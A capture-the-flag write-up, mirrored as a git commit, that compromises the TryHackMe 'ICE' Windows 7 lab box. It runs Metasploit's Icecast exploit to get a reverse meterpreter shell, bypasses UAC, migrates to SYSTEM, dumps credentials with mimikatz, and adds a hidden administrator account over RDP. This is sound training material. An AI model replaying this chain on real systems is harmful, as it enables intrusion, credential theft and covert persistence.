mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-24 21:03:07 +00:00
Add files via upload
This commit is contained in:
parent
9175a2acea
commit
fb25a38723
1 changed files with 472 additions and 0 deletions
472
TryHackMe/ICE.md
Normal file
472
TryHackMe/ICE.md
Normal file
|
@ -0,0 +1,472 @@
|
|||
# TryHackMe-ICE CTF
|
||||
|
||||
> Abdullah Rizwan | 09 September ,09 : 05 PM
|
||||
|
||||
## NMAP
|
||||
|
||||
```
|
||||
export IP=10.10.215.129
|
||||
|
||||
```
|
||||
|
||||
It is a good practice to scan all ports so we are going to use this syntax
|
||||
```
|
||||
nmap -T4 -A -p- $IP
|
||||
|
||||
```
|
||||
|
||||
|
||||
```
|
||||
Host is up (0.17s latency).
|
||||
Not shown: 65523 closed ports
|
||||
PORT STATE SERVICE VERSION
|
||||
135/tcp open msrpc Microsoft Windows RPC
|
||||
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
||||
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
|
||||
3389/tcp open ssl/ms-wbt-server?
|
||||
|_ssl-date: 2020-09-09T16:59:43+00:00; -8h59m59s from scanner time.
|
||||
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
||||
|_http-server-header: Microsoft-HTTPAPI/2.0
|
||||
|_http-title: Service Unavailable
|
||||
8000/tcp open http Icecast streaming media server
|
||||
|_http-title: Site doesn't have a title (text/html).
|
||||
49152/tcp open msrpc Microsoft Windows RPC
|
||||
49153/tcp open msrpc Microsoft Windows RPC
|
||||
49154/tcp open msrpc Microsoft Windows RPC
|
||||
49158/tcp open msrpc Microsoft Windows RPC
|
||||
49159/tcp open msrpc Microsoft Windows RPC
|
||||
49161/tcp open msrpc Microsoft Windows RPC
|
||||
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
|
||||
TCP/IP fingerprint:
|
||||
OS:SCAN(V=7.80%E=4%D=9/9%OT=135%CT=1%CU=32788%PV=Y%DS=2%DC=T%G=Y%TM=5F5988C
|
||||
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=S%TS=
|
||||
OS:7)OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M5
|
||||
OS:08NW8ST11%O6=M508ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
|
||||
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M508NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
|
||||
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
|
||||
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
|
||||
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
|
||||
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
|
||||
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
|
||||
OS:N%T=80%CD=Z)
|
||||
|
||||
Network Distance: 2 hops
|
||||
|
||||
Host script results:
|
||||
|_clock-skew: mean: -7h44m58s, deviation: 2h30m00s, median: -8h59m59s
|
||||
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:a7:8e:88:a9:05 (unknown)
|
||||
| smb-os-discovery:
|
||||
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|
||||
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|
||||
| Computer name: Dark-PC
|
||||
| NetBIOS computer name: DARK-PC\x00
|
||||
| Workgroup: WORKGROUP\x00
|
||||
|_ System time: 2020-09-09T11:59:35-05:00
|
||||
| smb-security-mode:
|
||||
| account_used: guest
|
||||
| authentication_level: user
|
||||
| challenge_response: supported
|
||||
|_ message_signing: disabled (dangerous, but default)
|
||||
| smb2-security-mode:
|
||||
| 2.02:
|
||||
|_ Message signing enabled but not required
|
||||
| smb2-time:
|
||||
| date: 2020-09-09T16:59:35
|
||||
|_ start_date: 2020-09-09T16:11:28
|
||||
|
||||
TRACEROUTE (using port 199/tcp)
|
||||
HOP RTT ADDRESS
|
||||
1 177.21 ms 10.8.0.1
|
||||
2 180.01 ms 10.10.215.129
|
||||
|
||||
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
Nmap done: 1 IP address (1 host up) scanned in 931.07 seconds
|
||||
|
||||
|
||||
```
|
||||
|
||||
## Metaslpoit
|
||||
|
||||
Now we can look for `icecast` in msfconsole and there is a vulnerability for icecast
|
||||
|
||||
https://www.cvedetails.com/cve/CVE-2004-1561/
|
||||
|
||||
```
|
||||
search icecast
|
||||
|
||||
Matching Modules
|
||||
================
|
||||
|
||||
# Name Disclosure Date Rank Check Description
|
||||
- ---- --------------- ---- ----- -----------
|
||||
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
|
||||
|
||||
```
|
||||
|
||||
|
||||
Use this exploit and change settings according to your `tun0` and `machine_ip`.
|
||||
```
|
||||
Module options (exploit/windows/http/icecast_header):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
RHOSTS 10.10.215.129 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 8000 yes The target port (TCP)
|
||||
|
||||
|
||||
Payload options (windows/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
LHOST 10.8.94.60 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
||||
```
|
||||
exploit
|
||||
|
||||
[*] Started reverse TCP handler on 10.8.94.60:4444
|
||||
[*] Sending stage (176195 bytes) to 10.10.215.129
|
||||
[*] Meterpreter session 1 opened (10.8.94.60:4444 -> 10.10.215.129:49264) at 2020-09-09 22:18:29 -0400
|
||||
|
||||
meterpreter >
|
||||
|
||||
|
||||
```
|
||||
|
||||
```
|
||||
getuid
|
||||
Server username: Dark-PC\Dark
|
||||
meterpreter > sysinfo
|
||||
Computer : DARK-PC
|
||||
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
|
||||
```
|
||||
## Privilege Escalation
|
||||
|
||||
Since we are not the administrator of this box we can run build module to look for privilege escalation
|
||||
|
||||
```
|
||||
meterpreter > run post/multi/recon/local_exploit_suggester
|
||||
|
||||
[*] 10.10.215.129 - Collecting local exploits for x86/windows...
|
||||
[*] 10.10.215.129 - 34 exploit checks are being tried...
|
||||
[+] 10.10.215.129 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
|
||||
nil versions are discouraged and will be deprecated in Rubygems 4
|
||||
[+] 10.10.215.129 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
|
||||
[+] 10.10.215.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
|
||||
[+] 10.10.215.129 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
|
||||
[+] 10.10.215.129 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
|
||||
[+] 10.10.215.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
|
||||
[+] 10.10.215.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
|
||||
[+] 10.10.215.129 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
|
||||
[+] 10.10.215.129 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
|
||||
meterpreter >
|
||||
|
||||
|
||||
```
|
||||
|
||||
Now selecting the first exploit found we are going to background `ctrl+z` our session.
|
||||
```
|
||||
msf5 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
|
||||
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(windows/local/bypassuac_eventvwr) > show options
|
||||
|
||||
Module options (exploit/windows/local/bypassuac_eventvwr):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (windows/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
LHOST 192.168.1.6 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Windows x86
|
||||
|
||||
|
||||
msf5 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
|
||||
SESSION => 1
|
||||
msf5 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.8.94.60
|
||||
LHOST => 10.8.94.60
|
||||
msf5 exploit(windows/local/bypassuac_eventvwr) >
|
||||
|
||||
|
||||
```
|
||||
|
||||
When we run this exploit we will have another session created
|
||||
|
||||
```
|
||||
exploit
|
||||
|
||||
[*] Started reverse TCP handler on 10.8.94.60:4444
|
||||
[*] UAC is Enabled, checking level...
|
||||
[+] Part of Administrators group! Continuing...
|
||||
[+] UAC is set to Default
|
||||
[+] BypassUAC can bypass this setting, continuing...
|
||||
[*] Configuring payload and stager registry keys ...
|
||||
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
|
||||
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
|
||||
[*] Sending stage (176195 bytes) to 10.10.215.129
|
||||
[*] Meterpreter session 2 opened (10.8.94.60:4444 -> 10.10.215.129:49278) at 2020-09-09 22:30:01 -0400
|
||||
```
|
||||
|
||||
Now we have to see which process is running as `authoritiy`
|
||||
|
||||
|
||||
```
|
||||
PID PPID Name Arch Session User Path [48/1936]
|
||||
--- ---- ---- ---- ------- ---- ----
|
||||
0 0 [System Process]
|
||||
4 0 System x64 0
|
||||
384 3124 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
|
||||
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
|
||||
500 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
|
||||
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
|
||||
552 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
|
||||
588 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
|
||||
592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
|
||||
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
|
||||
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
|
||||
692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
|
||||
700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
|
||||
708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
|
||||
812 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
|
||||
816 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
|
||||
884 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
|
||||
932 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
|
||||
1060 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
|
||||
1188 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
|
||||
1296 500 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
|
||||
1316 1288 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
|
||||
1392 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
|
||||
1420 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
|
||||
1476 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe
|
||||
1596 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
|
||||
1668 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
|
||||
1708 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
|
||||
1900 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
|
||||
1984 1316 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
|
||||
2132 816 slui.exe x64 1 Dark-PC\Dark C:\Windows\System32\slui.exe
|
||||
2244 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
|
||||
2268 816 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
|
||||
2512 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
|
||||
2572 1984 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe
|
||||
2676 816 rundll32.exe x64 1 Dark-PC\Dark C:\Windows\System32\rundll32.exe
|
||||
2724 2676 dinotify.exe x64 1 Dark-PC\Dark C:\Windows\System32\dinotify.exe
|
||||
3680 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
|
||||
3728 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
||||
Here `spoolsv.exe` is ruuning as authority and we can take advantage of that by `migrating` into that process.
|
||||
|
||||
|
||||
|
||||
```
|
||||
migrate -N spoolsv.exe
|
||||
[*] Migrating from 384 to 1392...
|
||||
[*] Migration completed successfully.
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter >
|
||||
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Kiwi
|
||||
|
||||
```
|
||||
meterpreter > load kiwi
|
||||
Loading extension kiwi...
|
||||
.#####. mimikatz 2.2.0 20191125 (x64/windows)
|
||||
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
|
||||
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
|
||||
## \ / ## > http://blog.gentilkiwi.com/mimikatz
|
||||
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
|
||||
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
|
||||
|
||||
Success.
|
||||
|
||||
|
||||
Kiwi Commands
|
||||
=============
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
creds_all Retrieve all credentials (parsed)
|
||||
creds_kerberos Retrieve Kerberos creds (parsed)
|
||||
creds_msv Retrieve LM/NTLM creds (parsed)
|
||||
creds_ssp Retrieve SSP creds
|
||||
creds_tspkg Retrieve TsPkg creds (parsed)
|
||||
creds_wdigest Retrieve WDigest creds (parsed)
|
||||
dcsync Retrieve user account information via DCSync (unparsed)
|
||||
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
|
||||
golden_ticket_create Create a golden kerberos ticket
|
||||
kerberos_ticket_list List all kerberos tickets (unparsed)
|
||||
kerberos_ticket_purge Purge any in-use kerberos tickets
|
||||
kerberos_ticket_use Use a kerberos ticket
|
||||
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
|
||||
lsa_dump_sam Dump LSA SAM (unparsed)
|
||||
lsa_dump_secrets Dump LSA secrets (unparsed)
|
||||
password_change Change the password/hash of a user
|
||||
wifi_list List wifi profiles/creds for the current user
|
||||
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
|
||||
|
||||
|
||||
```
|
||||
|
||||
Now using `creds_all` to retreive the password in parsed form
|
||||
|
||||
```
|
||||
eterpreter > creds_all
|
||||
[+] Running as SYSTEM
|
||||
[*] Retrieving all credentials
|
||||
msv credentials
|
||||
===============
|
||||
|
||||
Username Domain LM NTLM SHA1
|
||||
-------- ------ -- ---- ----
|
||||
Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb
|
||||
|
||||
wdigest credentials
|
||||
===================
|
||||
|
||||
Username Domain Password
|
||||
-------- ------ --------
|
||||
(null) (null) (null)
|
||||
DARK-PC$ WORKGROUP (null)
|
||||
Dark Dark-PC Password01!
|
||||
|
||||
tspkg credentials
|
||||
=================
|
||||
|
||||
Username Domain Password
|
||||
-------- ------ --------
|
||||
Dark Dark-PC Password01!
|
||||
|
||||
kerberos credentials
|
||||
====================
|
||||
|
||||
Username Domain Password
|
||||
-------- ------ --------
|
||||
(null) (null) (null)
|
||||
Dark Dark-PC Password01!
|
||||
dark-pc$ WORKGROUP (null)
|
||||
|
||||
```
|
||||
|
||||
|
||||
|
||||
While more useful when interacting with a machine being used, what command allows us to watch the remote user's desktop in real time?
|
||||
|
||||
```
|
||||
screenshare
|
||||
```
|
||||
|
||||
How about if we wanted to record from a microphone attached to the system?
|
||||
|
||||
```
|
||||
record mic
|
||||
```
|
||||
|
||||
|
||||
To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don't ever do this on a pentest unless you're explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.
|
||||
|
||||
```
|
||||
timestomp
|
||||
```
|
||||
|
||||
|
||||
|
||||
Mimikatz allows us to create what's called a `golden ticket`, allowing us to authenticate anywhere with ease. What command allows us to do this?
|
||||
|
||||
Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.
|
||||
|
||||
|
||||
```
|
||||
golden_ticket_create
|
||||
```
|
||||
# Extra
|
||||
|
||||
## RDP
|
||||
|
||||
If you want to remotely connect to the box and use it's GUI you can do that by checking if `rdp` is enabled on that box
|
||||
|
||||
|
||||
```
|
||||
meterpreter > run post/windows/manage/enable_rdp
|
||||
|
||||
[*] Enabling Remote Desktop
|
||||
[*] RDP is already enabled
|
||||
[*] Setting Terminal Services service startup mode
|
||||
[*] The Terminal Services service is not set to auto, changing it to auto ...
|
||||
[*] Opening port in local firewall if necessary
|
||||
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200909230409_default_10.10.215.129_host.windows.cle_189827.txt
|
||||
|
||||
```
|
||||
|
||||
If you want you can add a new user as long as your `Authority`
|
||||
|
||||
```
|
||||
terpreter > run getgui -u arz -p Password01!
|
||||
|
||||
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
|
||||
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
|
||||
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
|
||||
[*] Carlos Perez carlos_perez@darkoperator.com
|
||||
[*] Setting user account for logon
|
||||
[*] Adding User: arz with Password: Password01!
|
||||
[*] Hiding user from Windows Login screen
|
||||
[*] Adding User: arz to local group 'Remote Desktop Users'
|
||||
[*] Adding User: arz to local group 'Administrators'
|
||||
[*] You can now login with the created user
|
||||
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20200909.1126.rc
|
||||
|
||||
```
|
||||
Since `Dark` is logged in for now this would mess up the box if we try to login with a new user.
|
||||
|
||||
```
|
||||
root@kali:~# rdesktop -u dark -p Password01! 10.10.215.129
|
||||
Autoselecting keyboard map 'en-us' from locale
|
||||
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
|
||||
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
|
||||
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
|
||||
Connection established using SSL.
|
||||
Protocol(warning): process_pdu_logon(), Unhandled login infotype 1
|
||||
Clipboard(error): xclip_handle_SelectionNotify(), unable to find a textual target to satisfy RDP clipboard text request
|
||||
|
||||
```
|
||||
|
||||
<a href="https://imgur.com/7Dw4QmA"><img src="https://i.imgur.com/7Dw4QmA.png" title="source: imgur.com" /></a>
|
||||
|
Loading…
Reference in a new issue